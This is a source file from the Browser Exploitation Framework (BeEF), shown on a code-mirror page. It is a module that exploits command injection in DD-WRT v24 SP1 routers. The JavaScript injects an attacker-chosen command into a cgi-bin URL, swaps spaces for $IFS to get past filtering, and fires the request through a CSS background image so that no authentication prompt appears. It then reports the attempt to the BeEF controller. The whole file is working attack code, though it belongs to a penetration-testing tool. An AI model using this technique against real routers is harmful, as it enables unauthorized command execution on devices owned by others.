Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
 Path: blob/master/modules/exploits/router/ddwrt_v24_sp1_cmd_exec/command.js
1154 views
1
//

2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]

3
// Browser Exploitation Framework (BeEF) - https://beefproject.com

4
// See the file 'doc/COPYING' for copying permission

5
//

6


7
beef.execute(function() {

8
    var host = '<%= @host %>';

9
    var cmd  = '<%= @cmd %>';

10
    var path = 'cgi-bin/;';

11


12
    if (!host.match(/\/$/))

13
        host += '/';

14


15
    if (cmd.indexOf(' ') != -1)

16
        cmd = cmd.replace(/\s+/g, '$IFS');

17


18
    // Prevent auth dialog by generating the request via a CSS URL instead of an invisible iframe.

19
    var ddwrt_div_<%= @command_id %> = document.createElement('div');

20
    ddwrt_div_<%= @command_id %>.setAttribute('style', 'background-image: url("' + host + path + cmd + '")');

21
    document.body.appendChild(ddwrt_div_<%= @command_id %>);

22


23
    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');

24


25
    setTimeout(function() { document.body.removeChild(ddwrt_div_<%= @command_id %>) }, 15 * 1000);

26
});

27


28